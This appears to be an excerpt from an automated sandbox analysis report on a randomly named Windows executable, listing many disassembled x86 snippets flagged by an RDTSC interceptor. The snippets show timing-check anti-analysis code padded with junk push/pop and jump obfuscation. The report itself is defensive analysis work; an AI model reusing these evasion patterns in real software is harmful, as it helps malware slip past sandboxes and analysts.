Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E80296 second address: E802DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F8C24FD04C6h 0x00000009 jmp 00007F8C24FD04CFh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F8C24FD04D0h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push esi 0x0000001c jnp 00007F8C24FD04CCh 0x00000022 pop esi 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 pushad 0x00000029 popad 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E864E1 second address: E864FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8C2504F390h 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E868DB second address: E868E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C24FD04C6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E868E5 second address: E86945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007F8C2504F386h 0x00000010 jp 00007F8C2504F386h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pop edx 0x0000001a pushad 0x0000001b pushad 0x0000001c jmp 00007F8C2504F394h 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F8C2504F392h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8C2504F391h 0x00000032 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E86DA1 second address: E86DC5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C24FD04C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F8C24FD04D6h 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E86DC5 second address: E86DCF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C2504F386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E86DCF second address: E86DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8C24FD04CBh 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E86F0E second address: E86F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8B686 second address: E8B68A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E19B84 second address: E19B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E19B88 second address: E19B8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8A566 second address: E8A583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F398h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5EA5A second address: E5EA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5EA5E second address: E3C205 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F8C2504F388h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 call 00007F8C2504F38Fh 0x00000026 jne 00007F8C2504F38Ch 0x0000002c pop edx 0x0000002d jmp 00007F8C2504F396h 0x00000032 call dword ptr [ebp+122D2AC3h] 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F8C2504F390h 0x00000040 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5EFE4 second address: E5EFFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5EFFE second address: E5F004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F14E second address: E5F154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F154 second address: E5F18E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push esi 0x0000000b jmp 00007F8C2504F390h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007F8C2504F398h 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F24F second address: E5F255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F255 second address: E5F25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F25A second address: E5F260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F2DE second address: E5F2F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F411 second address: E5F415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F663 second address: E5F669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F669 second address: E5F66D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5A8F9 second address: E5A906 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5A906 second address: E5A90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E64E46 second address: E64E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C2504F394h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E65E69 second address: E65ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 mov ebx, dword ptr [ebp+122D3B66h] 0x0000000d push dword ptr fs:[00000000h] 0x00000014 or bl, FFFFFFBBh 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e clc 0x0000001f mov eax, dword ptr [ebp+122D03D1h] 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F8C24FD04C8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f and ebx, 3A625D46h 0x00000045 push FFFFFFFFh 0x00000047 je 00007F8C24FD04D2h 0x0000004d jc 00007F8C24FD04CCh 0x00000053 jo 00007F8C24FD04C6h 0x00000059 nop 0x0000005a jp 00007F8C24FD04D8h 0x00000060 push eax 0x00000061 push edx 0x00000062 jp 00007F8C24FD04C6h 0x00000068 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E68D5D second address: E68D6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E69D1B second address: E69D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6AC51 second address: E6AC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6BDEC second address: E6BDF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6CD3B second address: E6CD4E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8C2504F388h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6CD4E second address: E6CDF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F8C24FD04C8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sub ebx, dword ptr [ebp+122D3B8Ah] 0x0000002a push dword ptr fs:[00000000h] 0x00000031 mov ebx, dword ptr [ebp+122D3996h] 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov dword ptr [ebp+122D2D36h], esi 0x00000044 mov eax, dword ptr [ebp+122D01D5h] 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007F8C24FD04C8h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 0000001Ah 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 push FFFFFFFFh 0x00000066 add dword ptr [ebp+122D2F47h], esi 0x0000006c nop 0x0000006d jmp 00007F8C24FD04D2h 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6CDF2 second address: E6CDF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E6CDF6 second address: E6CE05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E71456 second address: E7147F instructions: 0x00000000 rdtsc 0x00000002 je 00007F8C2504F386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jo 00007F8C2504F38Ch 0x00000013 jnl 00007F8C2504F386h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8C2504F38Eh 0x00000020 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E72515 second address: E72519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E735FA second address: E73609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jp 00007F8C2504F39Ah 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FE0E second address: E5FE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FE13 second address: E5FE72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8C2504F398h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push ecx 0x00000014 jg 00007F8C2504F38Ch 0x0000001a pop ecx 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F8C2504F397h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E59D1C second address: E59D26 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C24FD04C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E59D26 second address: E59D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C2504F38Bh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FE72 second address: E5FE88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FE88 second address: E5FE93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F8C2504F386h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FF06 second address: E5FF10 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FF10 second address: E5FF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FF14 second address: E5FF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FF23 second address: E5FF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5FF28 second address: E3CE01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jo 00007F8C24FD04DDh 0x00000010 call 00007F8C24FD04D0h 0x00000015 add dword ptr [ebp+122D2925h], edx 0x0000001b pop edi 0x0000001c lea eax, dword ptr [ebp+1248E814h] 0x00000022 mov ecx, dword ptr [ebp+12458D9Bh] 0x00000028 stc 0x00000029 nop 0x0000002a jmp 00007F8C24FD04D2h 0x0000002f push eax 0x00000030 jmp 00007F8C24FD04D1h 0x00000035 nop 0x00000036 mov edi, dword ptr [ebp+122D3680h] 0x0000003c lea eax, dword ptr [ebp+1248E7D0h] 0x00000042 mov dword ptr [ebp+12456204h], eax 0x00000048 nop 0x00000049 jmp 00007F8C24FD04D6h 0x0000004e push eax 0x0000004f jnl 00007F8C24FD04CAh 0x00000055 nop 0x00000056 jo 00007F8C24FD04C9h 0x0000005c mov cx, di 0x0000005f call dword ptr [ebp+122D1AB5h] 0x00000065 push eax 0x00000066 push edx 0x00000067 push ecx 0x00000068 je 00007F8C24FD04C6h 0x0000006e pop ecx 0x0000006f jmp 00007F8C24FD04D2h 0x00000074 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8A9B9 second address: E8A9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8A9BF second address: E8A9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8AB04 second address: E8AB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F38Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8AB1D second address: E8AB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8C24FD04D6h 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007F8C24FD04D9h 0x00000012 jc 00007F8C24FD04C6h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8AE09 second address: E8AE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C2504F386h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E8AE14 second address: E8AE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8C24FD04C6h 0x0000000a jmp 00007F8C24FD04D0h 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E08B5C second address: E08B62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E164B3 second address: E164B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E950D9 second address: E950E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E950E0 second address: E9510D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8C24FD04C6h 0x0000000a popad 0x0000000b jno 00007F8C24FD04D5h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007F8C24FD04C6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E95252 second address: E95256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E95256 second address: E9525C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E9525C second address: E95262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E95262 second address: E952A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C24FD04D2h 0x00000008 jmp 00007F8C24FD04D4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F8C24FD04D2h 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E952A0 second address: E952A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E957BA second address: E957C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F8C24FD04C6h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E957C8 second address: E957CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E957CC second address: E957D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E9591F second address: E9592B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F8C2504F386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E95D4A second address: E95D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E95D50 second address: E95D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA129C second address: EA12A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA12A0 second address: EA12AA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C2504F386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA12AA second address: EA12CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8C24FD04D4h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c jc 00007F8C24FD04C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
